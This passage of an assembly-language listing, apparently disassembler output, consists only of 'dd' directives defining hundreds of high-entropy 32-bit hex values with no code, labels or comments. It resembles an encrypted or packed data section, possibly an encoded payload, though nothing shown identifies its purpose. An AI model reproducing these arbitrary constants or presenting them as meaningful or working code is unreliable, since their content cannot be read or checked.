5AEB75CEh, 5B55D158h, 452E48FDh, 233D993Ch, 0A9AD3085h dd 28B45002h, 0B716189Bh, 6BF19F7h, 86D88383h, 0EE71C262h dd 30E02E3Ch, 0D759EA4Dh, 0F17765DAh, 0BCCC471h, 0B203ADCBh dd 1BA4651Ch, 9A2B9B65h, 5F9B4A6h, 0DD058808h, 4D7FE900h dd 822C70C5h, 8A656BF8h, 0D9D558DBh, 6A35888h, 3AD583C0h dd 0A7B934A7h, 149E162Eh, 7969749Fh, 0AE71093h, 0C53F9178h dd 32F0F84Dh, 0E4876860h, 57CAE063h, 0F841D4E2h, 7BAA434Bh dd 0B639B7C3h, 0BA2D5DB2h, 0BACA411h, 92238A49h, 64F629FCh dd 0F1DD6C80h, 5DF91E0Bh, 0F768312Bh, 56EF47E6h, 0B646FB20h dd 0C0D1134Eh, 5AE224FCh, 26A82CACh, 21A3B55Ch, 0CA1214A1h dd 0D458DABh, 0F67B63FBh, 0EA076773h, 0DE09E50Dh, 0BAD5D85Fh dd 0C648CC4Fh, 810355BCh, 6EB4B401h, 0A0A72C24h, 96739C1Fh dd 8A0DF843h, 7E6B8403h, 25F9903Ah, 0EB96D85h, 5ADC60E2h dd 75EFC128h, 48AD48FDh, 0C9B93DBFh, 1C960E26h, 1EA4CCA7h dd 437C189Bh, 6C890C8Dh, 0F09E5983h, 7B8EFE1Dh, 0E253D3D9h dd 559A2DB4h, 0FC768EEEh, 3A4EC447h, 0B235BA0Fh, 0A629AAC7h dd 0DE49EE23h, 7111D85Bh, 0B43EF29Eh, 0BC4CF1FFh, 59ED46E4h dd 985CE92Eh, 0E3D56EE0h, 3521DFC1h, 0B9BD40C1h, 188ACE0Ah dd 0A6AA28ABh, 16991E9Fh, 31479518h, 8E7E04B1h, 10F0777Ah dd 6D69DA58h, 0EC6602E6h, 0CF212B57h, 0FA6A4DC4h, 33B2BC09h dd 0AA1B8BFDh, 1120D4D8h, 0A42DAE9Eh, 5484070Fh, 99FDB638h dd 6F808BEDh, 5AA6ED64h, 0DB525CE9h, 4AFB6B09h, 4F3E4D24h dd 6230B7BAh, 0CEA91A97h, 1A9D211Bh, 32C1A91Ah, 0CD0E08BDh dd 2F8FFC15h, 6969808Ch, 9E0BE786h, 0B8022158h, 4B51A64Fh dd 8C2817F6h, 0AE280D37h, 0A6A8A82Bh, 69E66252h, 7A6F6ECh dd 7E01C903h, 0D99378FBh, 0CDED2B62h, 0CF5084D1h, 4EE76E2Bh dd 404C2E67h, 0F43A97D9h, 0A158D2B1h, 76A14E73h, 1295776Bh dd 6E3C004h, 0FA17C408h, 0EE71F41Fh, 0B3258263h, 8657B60Dh dd 0F19B45ACh, 3D19C471h, 425DF8FFh, 2D29AC40h, 111DCAF7h dd 0E451FEDBh, 0D007E20Bh, 86917C95h, 0ED709Ch, 0A18B35E7h dd 8C40A78Bh, 19C97AF4h, 3542C59Ah, 2EB03333h, 2210A5ABh dd 0AF992A8Fh, 0A8D1B6Fh, 5B72EB0Ch, 0E27515FAh, 63E4EC59h dd 0DA6BF45Bh, 9A0134A8h, 3D2FE821h, 8DDF29C0h, 6AA8B005h dd 7615D178h, 92159956h, 86099DE7h, 3E98D303h, 9841692h dd 148C1ABBh, 31BC30B6h, 0A29A50B6h, 3EC14189h, 0DE18D44h dd 0B3562C99h, 1AAB1BC9h, 2004EBC0h, 68853EB0h, 97B967Fh dd 0DC56AEE6h, 0DF495D67h, 0F9C2D85Bh, 0E24545AEh, 2FC29717h dd 0AE078F95h, 7A65E18h, 962FA021h, 755AC413h, 483A2292h dd 635FDFBh, 986A2A89h, 0A53312E7h, 24D970A3h, 0BDEF22CBh dd 82A22Ah, 5E6DB5B3h, 9849B77Bh, 2195189Eh, 3C6A9D46h dd 0C64385BAh, 0DC04F441h, 0C64194EAh, 0A52BAF3Ch, 0BCCF827h dd 0BE41CAD3h, 0E465EC6Bh, 0F579FC7Eh, 0A14B35DCh, 4E949421h dd 7D0AFC52h, 0F9F1588Bh, 5CD14E76h, 0A3248CE7h, 0AD86A724h dd 70F2625Ah, 0BB33ABC3h, 2EB01C73h, 0B75A7FABh, 16AF27B1h dd 31A3856Ch, 966804B1h, 0F28A0780h, 8C698635h, 0B05D8A63h dd 0CE50BC57h, 6CEC84Fh, 0DC69BC55h, 55E93B3Fh, 0C159F2C5h dd 0A115982Fh, 79D364C6h, 0EF707FFCh, 6EC761B0h, 32B439B9h dd 6DEBC920h, 8E4E50E5h, 669987E7h, 1D4538E3h, 28F62CAFh dd 1A9C20A3h, 0E911497h, 285088Bh, 0DEF2FC7Fh, 0EA6DF073h dd 8830E467h, 0E8C02708h, 6D49FA74h, 7AB96C1Ah, 40D34F42h dd 0D3B025E8h, 0C419AA06h, 0B19F05ECh, 0FB888431h, 72C347AFh dd 66E97A07h, 35B22CE3h, 1EA121BCh, 2BB321B9h, 53DE59D3h dd 5FC151E5h, 4EA165C2h, 29AF8D64h, 83000CB9h, 0FA4B3FDBh dd 8F33A8B4h, 832B8D18h, 993DB932h, 0A928BA31h, 0E81DB733h dd 0D150EB4Fh, 0D545AC5Bh, 0FF71D257h, 0FC529479h, 0E771E96Eh dd 139515B9h, 18AE70B2h, 3B950582h, 37B9319Dh, 36B92D82h dd 7BDA2EAAh, 4BC377B7h, 72C05CCAh, 73FA73EDh, 0ACC63E0h dd 9FE476C4h, 97279D0Fh, 831D8302h, 0BF2F8837h, 8D51B036h dd 0B624AD39h, 0C451E85Ah, 0AA49D156h, 0FF44D664h, 0FD41FD6Fh dd 0E361E060h, 48CEF06Fh, 1E901AA4h, 168A0098h, 3FA119DFh dd 38A504A7h, 3EA525A2h, 57D951FDh, 43C445FBh, 63CE4FF7h dd 63F460E4h, 67E861DFh, 930BBA7Fh, 8804BC16h, 0A7138515h dd 0A6309F5Bh, 0A325A509h, 0C849B402h, 0DA44D65Eh, 0A264DB4Eh dd 0D06DF958h, 0D968FC7Ah, 7E64FE6Eh, 34811DBCh, 328C0086h dd 5AB80D8Ah, 3A53190h, 2EB02CA4h, 58D874DAh, 6BC85CD7h dd 6AC463A7h, 62F87DCFh, 63E565C9h, 9F1061CDh, 8B36F436h dd 8F00BC1Fh, 0A2388C2Fh, 8D4D913Bh, 0DB17B022h, 0DD5CCB49h dd 0C36EAC41h, 0E878F657h, 0E07EFD64h, 8244F04Eh, 208D19B8h dd 7981C9Ch, 388F2D82h, 33B82AB4h, 28A625BBh, 55F14082h dd 47FD50D6h, 50C45AC9h, 5B995DE6h, 63DB60F2h, 98CE73E2h dd 9719913Dh, 8319A36Fh, 0B634A60Dh, 0BE309932h, 0A52BA13Bh dd 0C676BC7Eh, 0D87DDE56h, 0ED44C748h, 0E0459868h, 0F56CEF60h dd 3CCFB370h, 1A82069Eh, 0D9738EBh, 25AA39BCh, 2F8362E0h dd 6DC130BFh, 5BF34CDEh, 52E849C3h, 78F452D7h, 7DF460E2h dd 67D608CAh, 9A10BA0Bh, 8704A416h, 0B232E402h, 0D225BD3Eh dd 0B23AB51Ch, 0D369AD26h, 0C165D15Ah, 0C749C16Dh, 0F374F54Bh dd 0E763C513h, 1757F466h, 14BA0F9Eh, 38505A9h, 28B436E3h dd 22B021A3h, 2DA9248Ah, 44EE3CDCh, 6CC844DAh, 1EC448CEh dd 76D46CD5h, 72FA79E5h, 8C1472D3h, 8914981Eh, 8D319B0Eh dd 0D637B934h, 0B80EA41Dh, 0DB35A522h, 0D759D17Dh, 0E55DE22Fh dd 0EE7CC551h, 0E163C472h, 0F176ED68h, 358D32FFh, 1E8C1581h dd 31933482h, 21A63DB8h, 8C9348Ah, 5FCF03B7h, 7DD440D6h dd 4BD14BCEh, 589972F0h, 6FFF53E7h, 0ABE470E6h, 0A2079D08h dd 830A831Dh, 945D9310h, 0BE309923h, 0B520A11Dh, 0D36ADA70h dd 0C544C450h, 0EA6FA449h, 0FC70E854h, 0E365E549h, 3589CE03h dd 3E9F1187h, 7860799h, 398D2FACh, 4AA335B8h, 4E8E3089h dd 57E656DEh, 49C058CCh, 6ED320CDh, 7AFE66C7h, 54F16BEEh dd 830D8E16h, 8F209C12h, 0A7138B0Ah, 8321965Bh, 0BF3BA93Ah dd 0D55BAE0Ah, 0DA50D945h, 0F64BC742h, 0F87CF770h, 0DD79DE13h dd 1B75ED75h, 68711ADh, 2B850D9Ah, 28B20D86h, 3A8354AEh dd 2BAB1DA7h, 53DD53DCh, 43DF44E0h, 71F543C9h, 7BE676DAh dd 6FFB78DCh, 0AD7D67EDh, 9A22B524h, 97119A0Ah, 0BA3ADC2Fh dd 0B928A33Ch, 0DB2AA728h dd 0DD56B84Fh, 0C54CC241h, 0FF7AA057h, 0FD7EFC63h, 0EC7CEA7Fh dd 769C119Eh, 1C8E1581h, 308417E7h, 3DA658BFh, 32AC27ACh dd 4ED309C3h, 4BDF46D2h, 4DC96BDFh, 77D179ECh, 6FE174FDh dd 8AEF4D87h, 971B8A1Eh, 920CAB1Bh, 0B4338F20h, 0AB25B732h dd 0A3319B2Fh, 0FF39D94Bh, 0D848C45Dh, 0D155C149h, 0D37BFD6Bh dd 0F267C50Fh, 1F93F266h, 0B813B83h, 0E973D85h, 38905C9Eh dd 24BF35A7h, 5B9330A2h, 5BF35CDAh, 67A949C3h, 4ADC76E7h dd 20A327DEh, 2C944CFh, 0B51E992Dh, 8F1E9F1Fh, 0DE18812Ch dd 9D32BD09h, 8D27A93Fh, 0C278B926h, 0CB63B476h, 0C750F94Ch dd 0F74FE56Dh, 0CF68E57Fh, 2C01C57Fh, 17A61F9Eh, 0A883A9Bh dd 22980596h, 7D875496h, 14C7223Dh, 5C6DB7E9h, 585262B2h dd 8B5E72BFh, 12A327C3h, 50DFC804h, 52B50D5h, 7B8EEC07h dd 0E253D3ADh, 884918DCh, 474DD891h, 766A3F0Eh, 0B235D06Ah dd 0EAA4442Fh, 9A77A307h, 0DE40917Dh, 900E258h, 0A2722C33h dd 2A8724A3h, 0A1B236B6h, 64EEB64Eh, 4A0DCFCFh, 14BD53Ch dd 0EA323481h, 0B728EBA3h, 16AF2663h, 0AE7D9A0h, 0FEB16CD5h dd 36FEF849h, 0A603BD3Eh, 0C237B133h, 9A5914D4h, 3D15C621h dd 800256AAh, 8AE93333h, 5EA47614h, 65D70114h, 442AD4D5h dd 85CED7C0h, 910EB51Fh, 0C7616714h, 6D95CDFh, 4AA2A0BBh dd 5415CFC7h, 5879B3BBh, 26A944EFh, 18F720B3h, 66917EC5h dd 285677Bh, 0A528FC15h, 34F80F23h, 8161D25Ch, 0FCC02702h dd 4349FA74h, 314CB4BCh, 9824C8BAh, 2F294B2Bh, 0A0099C8Ah dd 0DDDC9313h, 0F5D37B54h, 44CEB27Eh, 8766E1EFh, 0B2DD60C4h dd 0B12EABFCh, 7927CD40h, 0B9343C89h, 2AAD189Dh, 0E15E3E4Fh dd 0DC109364h, 8B893AB4h, 0FA55350Ch, 11781C77h, 67EE1794h dd 0D66FE78Dh, 0EA3910D6h, 96034BCAh, 46DDB83Bh, 2DD653D1h dd 0AC267AA6h, 0FAD11117h, 0CD8A0500h, 9EF97CD7h, 95128E2Ch dd 9DBEA36Ch, 52D5B08Eh, 0C7944CCFh, 0CA6502Eh, 0A37807B7h dd 14BBBC2Eh, 47CD4D9Fh, 5BDC40C2h, 0C5DB9178h, 0F6F2F84Dh dd 0C8FC134Bh, 875DD658h, 9B51D095h, 0C245C8A3h, 5BB8E13Fh dd 0AA1BAB0Ch, 0BAC5B4Dh, 92238311h, 0A6C4DE5Fh, 7AD78027h dd 8FDB074h, 79B5ED2Ch, 76145CE9h, 519FD514h, 3EE544F1h dd 0F1E83891h, 0CEF136C5h, 1A9D20AAh, 0A4F0561Ah, 0F2F0C175h dd 0BEEC95BCh, 0EF6DC64Fh, 9C69ECE3h, 0EE1D4DD2h, 24BECC79h dd 0BAD59580h, 0F331B437h, 0B9BC45AAh, 0B929C29h, 8A3BAC5Fh dd 7625F884h, 0CB7177FBh, 0E7E96CEFh, 5ADF680Fh, 4AB900D7h dd 0BDC548CAh, 82BE2Ah, 0A751BBB3h, 1FA50023h, 78C5189Bh dd 68DE48Fh, 0A82B0083h, 1126F425h, 0D45E96FEh, 5B90EF5Fh dd 0CA4CD4C4h, 0D4109547h, 0B35FE939h, 0A629AC47h, 0FE2F263h dd 8E27AF5Dh, 0F6F30D9Dh, 1EAD2CA4h, 6AED71F7h, 7A559BB0h dd 52D55AFBh, 7AE3D930h, 0BFE440F5h, 0CDA74077h, 0F62E78BFh dd 47CB1CF5h, 9F7246C4h, 0FEB73F45h, 87B57D22h, 7396BABFh dd 0DA6BDB4Dh, 9C1583DAh, 9A01A21Ch, 0B73D2BB2h, 9986B033h dd 0C731CEE7h, 0C24533E8h, 0D659DC5Fh, 0EF02D253h, 6EC74FA5h dd 60EDAC6Ah, 22265CDFh, 0DF3258F7h, 3EF778DDh, 2820C7E8h dd 7BA91A93h, 9A9D2461h, 0FE41EA9h, 7A0883CDh, 1579CA6Ah dd 0EAF87D6Ah, 0DD61D277h, 0AA8E8Ah, 4E460CCBh, 0BA3DC15Ch dd 0AF213038h, 9CA5A82Bh, 0D009E925h, 850DAE93h, 7E008583h dd 52CBF8FBh, 0E7AF9D9Ah, 149430DDh, 0C5932190h, 43838E04h dd 677717F0h, 7CFC30D9h, 0C34DBF4h, 4B952EA7h, 8386CDB4h dd 0FA7D005Ch, 0F0F971FAh, 0E20FE85Dh, 0D659D037h, 351E8053h dd 887DD6D2h, 0B239853Bh, 2326AC2Fh, 9A1DA09Ch, 8E1125FEh dd 0D23B090Bh, 79AF35ADh, 6AEDD576h, 5627E7E7h, 5DD86477h dd 46C9D54Bh, 4F9D7CC3h, 148D9844h, 2229ADA4h, 1B341C9Fh dd 2AAD30B3h, 9BE625BAh, 5E0A8D0Fh, 9A1CCC53h, 0FAA29EE2h dd 0BB25A03Fh, 0C13B493Ah, 9916864Fh, 0EDEBD846h, 0AF2EA4D8h dd 923288A1h, 0D4EB7B0Fh, 414F15FCh, 0AEC274C1h, 32B538BBh dd 56D95537h, 3DA214D3h, 5FAE28A9h, 0A74A38DFh, 269F108Dh dd 2CE9E026h, 8B18DDA4h, 2B334C7h, 0F479942Eh, 0BB3C7073h dd 4B9EB431h, 0D263E47Dh, 0DDDA59C2h, 896DC075h, 0FE60E0FEh dd 5D74F979h, 0A022C68Ah, 0AE091713h, 452F11F8h, 0B10D78CDh dd 7382E16Fh, 0A3DC60D5h, 24D03E14h, 0BDF6B7CAh, 234638CCh dd 70D9F036h, 0CE2AFF94h, 42961328h, 0B13C81B3h, 717D369Eh dd 0EE70F8CDh, 0EAEF636Bh, 0D559DC5Eh, 0AA86FBABh, 18B20FCCh dd 0F530CC5Ah, 88C259CDh, 0C91267A0h, 546589Ch, 0E851D8DFh dd 1CAB2DBFh, 84788F0Ch, 0D5E152DCh, 64EE3A56h, 4A0DCFCFh dd 0D33E8FE8h, 44B6F3B0h, 0ABA5C0ABh, 455A1FD0h, 5DD956DCh dd 0A2C456C6h, 80169136h, 80069F00h, 0B30ABC17h, 0B93EB039h dd 0B7069438h, 0D85CCE4Dh, 0D848E647h, 0F04ECD54h, 0E26DDD47h dd 0E37BE363h, 1BA98071h, 1A941385h, 169607A3h, 56D95EDFh dd 4ACD5083h, 5DB32DC7h, 5BCF16DFh, 56874ACAh, 53D320CFh dd 69B15FD4h, 68E06DECh, 0FC149F1Ch, 0B828A326h, 912B9147h dd 0F4759612h, 0B23BA539h, 5268CA36h, 0AE31B437h, 38C82976h dd 5019AA01h, 0BC18FB96h, 0EBFE8407h, 72C3437Dh, 12F6842Eh dd 0D1C30ADFh, 78EA6A62h, 7E6911CBh, 50934991h, 37520E32h dd 0A32C07D2h, 12A324D9h, 518B7A04h, 77D86626h, 0D84643F2h dd 3FE0676Bh, 2C59EA68h, 46B796DAh, 0FBA3A09h, 59FA5A3Ah dd 5D01447Fh, 0E69E5FDCh, 0FB159C33h, 820D604Fh, 30AA7CFFh dd 26A95EB0h, 0CB1E64ABh, 52E36349h, 4BBD8CC4h, 69BF2A50h dd 158BA148h, 0F25A289Dh, 0E807F40Ch, 165EF6Ch, 0AD810487h dd 0BD2ABB3Dh, 0AA2DC23Ch, 4FA2E02Fh, 0CE67EFC5h, 3DBB4BA3h dd 403054C0h, 27D24FCCh, 9E17B6F5h, 17985128h, 863FB3E3h dd 2BACD152h, 3FA025A7h, 596BFD14h, 5D315CE9h, 1FCD50D3h dd 0D930194h, 7EF11689h, 0B3562CE3h, 1AAB1B31h, 0E911E7Fh dd 72F67F8Bh, 8217950Dh, 0BA6DB115h, 0E55B7198h, 57DCD86Dh dd 0C67FF70Dh, 37B0F14Ch, 0AE07AD46h, 9E6D2DA2h, 69489C29h dd 0BC360286h, 7A691707h, 0FFF578FBh, 50F0125Ah, 0E75039E3h dd 4EE768F9h, 0BD308123h, 0B37E5A40h, 2A9B2ED2h, 0BB2274A7h dd 12A306F8h, 271C818Fh, 0AA7D369Dh, 84709E23h, 0E00DBA6Bh dd 29D9DC5Fh, 0FC71E2C6h, 0E4814147h, 3FB89A4Eh, 0A61FB27Bh dd 171BCA71h, 0B80FF5A2h, 0D253DC0Bh, 89AB2DAFh, 5CD14666h dd 0CB1E3CE7h, 52E364F5h, 7886C909h, 0D2BD40F5h, 2EB134BBh dd 61EA7BFCh, 38AB2FD4h, 0AC15CD7h, 0C5139178h, 9AE6F84Dh dd 0E669EC68h, 0C28855EEh, 4308D461h, 0F47E36F6h, 437D543Fh dd 0A6C54FCCh, 0C921A427h, 0DC5CD652h, 0C227D84Ah, 85FDCC4Fh dd 58CAE662h, 6D25EDEBh, 56DB695Bh, 4FA5C3D3h, 0B3C144C7h dd 4AC2B0Eh, 9B2475AFh, 1AAB1CB9h, 0F164197Fh, 1C388B74h dd 0F679CA43h, 0E87D747Ch, 32E0E467h, 0D255D9CBh, 0C748A41Bh dd 2FC2C043h, 0AE078FC9h, 0A3B56CAAh, 1D499C1Fh, 0D80DFAC7h dd 421F11F8h, 0B27078CDh, 0EE419B6h, 5ADD736Bh, 7563C128h dd 0A02E48FDh, 28DA813Ch, 5FAD3085h, 7924A98Eh, 42952E85h dd 3A839970h, 3AF800B5h, 0EFF87078h, 0A2EEE86Bh, 29595753h dd 0A9C85F63h, 7841F259h dd 840BF7BEh, 0A643AD2Fh, 9877A149h, 0B20701E8h, 7A86883Dh dd 167D7300h, 0F9ED70F2h, 40BEF16Ah, 42BF58EDh, 0D3361F9Dh dd 3A8B7CC5h, 0ABBEF432h, 22A529EBh, 8E0A112h, 23C10A5h dd 17B476Fh, 0F2E19084h, 0CD37EC6Fh, 0FE696985h, 44C42B03h dd 4F45FE70h, 80273B82h, 422C0133h, 61DE5E03h, 8C610D96h dd 86638C39h, 7AFD946Bh, 91A226F7h, 54D97A7Eh, 729DD1DFh dd 0A658DDC7h, 6EC172F8h, 0B9BF8EB4h, 0E7BD08EBh, 509F2843h dd 0CDB0696h, 9864299h, 7671D83Bh, 0AACFF92h, 9A6AB56Fh dd 0E0AAC87Fh, 96F4411Fh, 523DF67Fh, 0AE31B42Bh, 0DA13860Eh dd 0B839B23Fh, 0AF28AA33h, 639AA22h, 57D500DEh, 29A3669Ch dd 5AFD2EAAh, 0C44AB80h, 0C3C57EF0h, 36B9907Bh, 7AAD5AB3h dd 8B5E77F0h, 12A32489h, 130D8104h, 0FA1700B5h, 271AEF94h dd 0E78DB966h, 0F059DC5Fh, 0CA47B476h, 0FCD43B10h, 31358E00h dd 4D79A0EBh, 9A1AC828h, 339C9417h, 82339686h, 0E3062FA8h dd 6ADB4CE1h, 0A9FA462h, 6E85ED56h, 0E34A4CF9h, 3A8B5547h dd 613CB9B7h, 9A51E95h, 47997651h, 9F7243C5h, 0FEB73889h dd 8C7500F8h, 18E27D40h, 0E60D55EEh, 0C3E1D461h, 0D23066B9h dd 4C08545Fh, 0D84C4FCCh, 13284730h, 78FE996Ch, 48224384h dd 46AD3D8Eh, 0CA0274C1h, 0DB0E9F6Ch, 544CA38Ch, 0CACD66EFh dd 8D42F7Ah, 18C139BBh, 26DC1CC7h, 0A808DFA3h, 8E9122ACh dd 34BB4736h, 0E70DFC7Fh, 0F40E75B4h, 0DE61E451h, 5793D85Bh dd 0C67FF200h, 44352943h, 2BF64BC8h, 0A213BD5Fh, 16199C1Fh dd 8A09524Eh, 5E4E8E0Ah, 1C9A1795h, 468F03CFh, 3FBB098Fh dd 6E9E74F6h, 27A821BFh, 16D6489Fh, 4FC155D0h, 6AC056C5h dd 189839FEh, 26A92CAFh, 895D4FA3h, 8B1C9902h, 8302C819h dd 0B83CB82Dh, 9847DD72h, 0D024A822h, 0C150D44Fh, 8650C05Ch dd 0EA6DC14Bh, 0E070B46Eh, 0FA60A86Fh, 29A198Fh, 46991E92h dd 3F9517C7h, 3CBC3CB5h, 6BE976A8h, 5BEA4ACEh, 47D957C3h dd 43854FC5h, 72B970F3h, 6BAD69F2h, 90A160E9h, 861D9F12h dd 890FCC43h, 0A83BC011h, 0AA3FB13Eh, 0E20CE838h, 0C250DD48h dd 0FD27BD09h, 0FB53C14Fh, 0F767F93Bh, 0F366F52Fh, 89BA02Fh dd 0A9F119Eh, 21C55798h, 77BC31B0h, 6AB919F3h, 4AE137AEh dd 13D055D2h, 1DD658Fh, 7BF100D0h, 0AB071E3h, 4AB5CF0Fh dd 6F39CB2Dh, 0C3B675F8h, 0CA714273h, 3AE8985Ah, 16CA9EFDh dd 0ED77FBBEh, 3C0B1F6Eh, 92FCCCD6h, 0B379F2F0h, 0FBACA57Dh dd 7EDAEDDAh, 72F578FBh, 66E96CEFh, 5ADD60E3h, 4ED154D7h dd 42C548CBh, 36B93CBFh, 2AAD30B3h, 1EA124A7h, 1295189Bh dd 6890C8Fh, 0FA7D0083h, 0EE71F477h, 0E265E86Bh, 0D659DC5Fh dd 0CA4DD053h, 0BE41C447h, 0B235B83Bh, 0A629AC2Fh, 9A1DA023h dd 0EE119417h, 0BDB92D88h, 0F5F97CC9h, 5CD2B056h, 0E9EE64E7h dd 1584C98h, 0D7E43D7h, 0B16D43C5h, 59510F3h, 3BD724E9h dd 65915EA4h, 1ECF9B87h, 778D46ACh, 0C44A44EEh, 26EC656Fh dd 315DD65Ch, 0E6935752h, 2411A9h, 33B1BC3Bh, 0AA1B947Fh dd 9E21C0CFh, 920AF01Bh, 3848C0Fh, 7ACBA37Ah, 1AE94DAEh dd 6625EBE7h, 0D326AB3Dh, 4AFB6F4Fh, 3D18B304h, 4917436h dd 0D9B9CFAFh, 1A12DCD3h, 0EC95FC14h, 7B18817Dh, 7579CA5Ch dd 0EF19F049h, 0AC62D64Ch, 2E1B554Bh, 45179717h, 0BE49C079h dd 0ADDA86C8h, 4A35DAD4h, 69E66348h, 7265E38h, 7E37BBC7h dd 46BE7BA3h, 0C66CE32Ch, 9DDD56DCh, 78EEC852h, 42C548CBh dd 3685D4BFh, 0AF2630B3h, 1E971B3Bh, 0ED63A873h, 691E470h dd 47FE0083h, 0EE47CBEBh, 6B6D9D6Bh, 0E07A29C2h, 35D13B53h dd 887E58CAh, 37BA7B3Bh, 0A61F938Fh, 0A58135AAh, 8DF99421h dd 0B105880Bh, 0E572BF36h, 6AED7073h, 0A00C8CB5h, 0C7D6A724h dd 46FF730Fh, 403E96C0h, 0AABE34BBh, 22A529ACh, 1689661Ch dd 0A70949Ch, 0BC0A0487h, 3A9DA877h, 0E5961391h, 0EC6220E6h dd 9E97D757h, 3BC5C0C1h, 3620C83Fh, 0A9599ECAh, 15D04F67h dd 73949953h, 59D653D0h, 36B97982h, 828474BBh, 0E12D43B2h dd 0D9D6A626h, 4ACD5064h, 0C0B9C5A1h, 0B7BA0A88h, 26A92C04h dd 1AA7A3F5h, 441A11E2h, 8987E39Bh, 0A788FF75h, 1593829Bh dd 1ED4E798h, 7F55EE64h, 3D310CCAh, 0BAB9444Ch, 1BCEB437h dd 0A21397EBh, 684C744Fh, 0F0E6FECh, 7E37BBC7h, 4D35FD74h dd 62EA6CD9h, 9A5E33C7h, 410A67D5h, 5026407Dh, 6599F53Fh dd 2E891472h, 3785388Eh, 52CE3C97h, 0FD08E564h, 27C6D78Ch dd 15F0CA03h, 390BADC3h, 2DD8EA2Bh, 35ECEB0Ah, 45C0EA33h dd 1E809AEDh, 5DA88A5Bh, 694549B0h, 75908A63h, 715D6176h dd 8D786A8Bh, 8BC84FB5h, 0A5606A93h, 0B3F067EBh, 0D3364ABBh dd 3A8B7F63h, 0D1C0DDECh, 0A1FBD754h, 0F970085Dh, 0C972EF6Dh dd 0A6856E84h, 0D80A893h, 0C0FC6490h, 0BC5DD645h, 0CC49E5EFh dd 0C1A108A9h, 1D5F5E3Dh, 4275B659h, 61DE5112h, 151D5A98h dd 0DE0CE6DEh, 8508A8EBh, 6D0BF408h, 32556398h, 70FFD9DDh dd 0A16750E5h, 66A92EE0h, 314FB811h, 371934DAh, 0E568284Bh dd 0E90AC68h, 0D001088Bh, 16A8F10Bh, 1C863A8Dh, 0DED9E18Ch dd 79D5D85Bh, 4B8A73ADh, 8C0558D6h, 59E69F37h, 27D26BF1h dd 962FA494h, 820D9013h, 0BFC11108h, 0F703731Bh, 66DF5466h dd 3CDB15E2h, 0A5F4DDDAh, 0CB40BED8h, 34B90A87h, 27CB36C6h dd 1A4A0196h, 379415FDh, 0BA61A7E9h, 7182FF7Ch, 7BF8C034h dd 0E253D7DFh, 53AE1FF4h, 0CA7BE8D8h, 0B641C447h, 0B6F52D34h dd 3AC10693h, 13E25FDCh, 0B82E2C82h, 0B807E0Bh, 77F94AC7h dd 5BE27486h, 9ECA660Ch, 0D7229B70h, 46FF7444h, 32BD40C3h dd 0AB3B13C3h, 2293102Eh, 7092FC5Eh, 6CC89B9Eh, 5479B42Ch dd 0CAF07DF1h, 6A8EC59h, 0BE3AE578h, 0FDFAD2DEh, 29EEAE8Bh dd 395D042Dh, 2086B036h, 0A81921A2h, 534D9C1Bh, 45A294EFh dd 5A167CB3h, 6E1ACC91h, 7B0EC38Dh, 0BE8158B5h, 0B532A4CAh dd 0FF13404Ah, 37D3305Bh, 8DCFEC26h, 8A2D2348h, 56937E3Dh dd 0FD710863h, 82AB7880h, 0B2659A41h, 2192108Fh, 0A09F26A4h dd 388CB88Ch, 44F4B489h, 50EAC0FDh, 5C29DCE1h, 6815E8D5h dd 3A01E4D9h, 0CECC6FFEh, 0C23C9306h, 0D62C871Ah, 991C8B1Bh dd 7649E95Ah, 0C73248FDh, 368F0434h, 0AAAD30B3h, 7E1127D3h dd 9910EF31h, 6893AB7h, 8E750083h, 65244C70h, 0ADCEE887h dd 0EED259A8h, 0CA4ED065h, 3A4EC547h, 0B235B8ECh, 0D83449Fh dd 0A5B91DAAh, 66A19421h, 3F8C23A1h, 76CF4357h, 5266F504h dd 5EE264D1h, 47A158DBh, 7E42C938h, 3ABD40F5h, 2BC535B7h dd 0DD5BE943h, 0BC70AC60h, 0AE089B38h, 758132B8h, 7BBDD3B4h dd 0D05640D2h, 26156963h, 3135B3EFh, 276637Dh, 33CE1759h dd 0AA1B88B8h, 9E21A424h, 17E3966Fh, 863FB486h, 92F8F483h dd 910E8AB5h, 0EB810F53h, 96EAF7F9h, 0CF3AFBB5h, 3EF77C4Ch dd 32B538B8h, 0A35F79DBh, 1AAB182Ah, 0E6946117h, 0FD7AF695h dd 9845897h, 24D408Ch, 219E1FD1h, 6A33E1B8h, 6D2FD9B0h dd 2FB66BD2h, 0AE078CBCh, 60D27ADCh, 96199C1Ch, 0F4E58466h dd 0CEFE7BFAh, 896590E4h, 0DE8F9310h, 0F1BB751Ch, 815AFF46h dd 7D69CD40h, 0FE923C89h, 0DD51783Ah, 2899AF22h, 12951B9Bh dd 0F1A7788Fh, 0CC458B06h, 0EE71F477h, 15479C6Dh, 0E06157DAh dd 0CA4DD053h, 5644B146h dd 4DCA45C9h, 9EA229D8h, 9A1DA015h, 8B659017h, 7DFB85E3h dd 0FD7C8B00h, 6EED46CBh, 2AE164E7h, 0ACB2B0CCh, 6F71B330h dd 9175BE03h, 5A713C0Fh, 571D83AFh, 0BDFEF767h, 32069564h dd 0FE8904B1h, 0BD00F87Bh, 0DEE051EFh, 0AE5DE055h, 306A3C11h dd 0EBFD37B4h, 0BCF09527h, 9C153596h, 9DC56427h, 0AA903D11h dd 36A28C39h, 0FF772AB2h, 6EC74C7Eh, 68A5D841h, 60E1D95Ah dd 0F2ABFAD3h, 0BB36B925h, 32830030h, 26A92CBFh, 532D27D7h dd 7B29723Dh, 0B22E6E77h, 364A5697h, 7AD079D8h, 2961D258h dd 0E46D53DEh, 0C649EC4Fh, 0A34B543h, 2DB4BE6Fh, 8259E13h dd 56982479h, 0B28615E4h, 7E418431h, 718178FBh, 6CC1A86Fh dd 6CE5E346h, 0C77A32D7h, 74FADC76h, 0B34E97BFh, 2A9B0838h dd 5EA124A7h, 422511EEh, 3E0A898Dh, 0DD700B5h, 0D8497FF2h dd 0E265686Bh, 6652A95Fh, 4EC8DAEBh, 1441F27Fh, 0A5385D0h dd 23DEB41Eh, 9A2B98A8h, 8E119517h, 0ABB58A7Fh, 4E7DD9F5h dd 8E2D70C5h, 0DA446EE4h, 34D56EE3h, 0C7712A64h, 0B138B733h dd 2EB1028Fh, 57A528A9h, 1C51A89Dh, 3CB59436h, 772A6287h dd 0C44A48C6h, 0CEF1546Fh, 2DF6E063h, 0F8695FD2h, 0C245C04Bh dd 5E48C83Fh, 55D24D02h, 0A6AA21D0h, 9615982Dh, 8D7C8C0Fh dd 0FFF738B3h, 6EC74C72h, 95A88341h, 60E1D75Ah, 4AC550D3h dd 58D031C7h, 3855BB03h, 1091A90Ah, 293646A3h, 1B7ABE57h dd 1AACB0EDh, 0CEFC5975h, 0EADF045h, 